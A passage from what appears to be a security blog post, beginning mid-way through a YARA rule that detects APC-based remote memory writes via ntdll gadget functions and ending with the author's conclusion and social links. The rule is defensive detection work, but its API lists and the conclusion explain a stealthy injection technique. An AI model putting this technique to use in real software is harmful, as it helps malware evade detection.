// Memory operation primitives used as write gadgets
$gadget_fillmemory = "RtlFillMemory" ascii wide
$gadget_bitmap = "RtlInitializeBitMapEx" ascii wide
$gadget_exitthread = "RtlExitUserThread" ascii wide
$gadget_copymemory = "RtlCopyMemory" ascii wide
$gadget_zeromemory = "RtlZeroMemory" ascii wide
$gadget_movememory = "RtlMoveMemory" ascii wide
// Companion APIs typically chained with this primitive
$api_virtualallocex = "VirtualAllocEx" ascii wide
$api_openprocess = "OpenProcess" ascii wide
$api_openthread = "OpenThread" ascii wide
$api_resumethread = "ResumeThread" ascii wide
$api_createsnapshot = "CreateToolhelp32Snapshot" ascii wide
// Special User APC flag value (NtQueueApcThreadEx2 variant)
// QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC = 0x2 — flag pushed as immediate
$special_apc_flag_1 = { B? 02 00 00 00 } // mov reg, 2
$special_apc_flag_2 = { 6A 02 } // push 2
$alertable_apc_flag = { B? 01 00 00 00 } // mov reg, 1 (alertable)
// String literal commonly seen in PoCs/tooling adapted from this primitive
$str_pid_hardcode = /pid\s*=\s*\d{2,6}/ ascii nocase
$str_apc_marker = "APC routines" ascii wide nocase
$str_remote_write = "WriteRemoteMemory" ascii wide
condition:
uint16(0) == 0x5A4D and // PE header (MZ)
filesize < 5MB and
// Must reference at least one APC queueing API
(
any of ($api_ntqueueapc*, $api_ntqueueapcex2)
)
and
// Must reference at least one ntdll routine used as write gadget
(
2 of ($gadget_fillmemory, $gadget_bitmap, $gadget_exitthread,
$gadget_copymemory, $gadget_zeromemory, $gadget_movememory)
)
and
// Must combine with remote process operation APIs
(
$api_virtualallocex and
($api_openprocess or $api_openthread)
)
and
// Either: classic variant (thread creation + resume)
// Or: Ex2 variant (Special User APC flag present)
(
($api_ntcreatethreadex and $api_resumethread) or
($api_ntqueueapcex2 and any of ($special_apc_flag_1, $special_apc_flag_2)) or
any of ($str_remote_write, $str_apc_marker)
)
}Here you have my collection of YARA rules:
GitHub — S12cybersecurity/YaraRules: Collection of interesting Yara Rules Collection of interesting Yara Rules. Contribute to S12cybersecurity/YaraRules development by creating an account on…
Conclusions
This primitive shows how creative argument abuse can turn legitimate ntdll routines into a fully functional remote write capability, without ever touching WriteProcessMemory. By chaining NtQueueApcThread with carefully chosen victim functions like RtlInitializeBitMapEx and RtlFillMemory, we deliver arbitrary bytes into a remote process using nothing more than the kernel's own APC dispatcher. The result is a write primitive that blends into normal thread activity
📌 Follow me: YouTube | 🐦 X | 💬 Discord Server | 📸 Instagram | Newsletter
S12.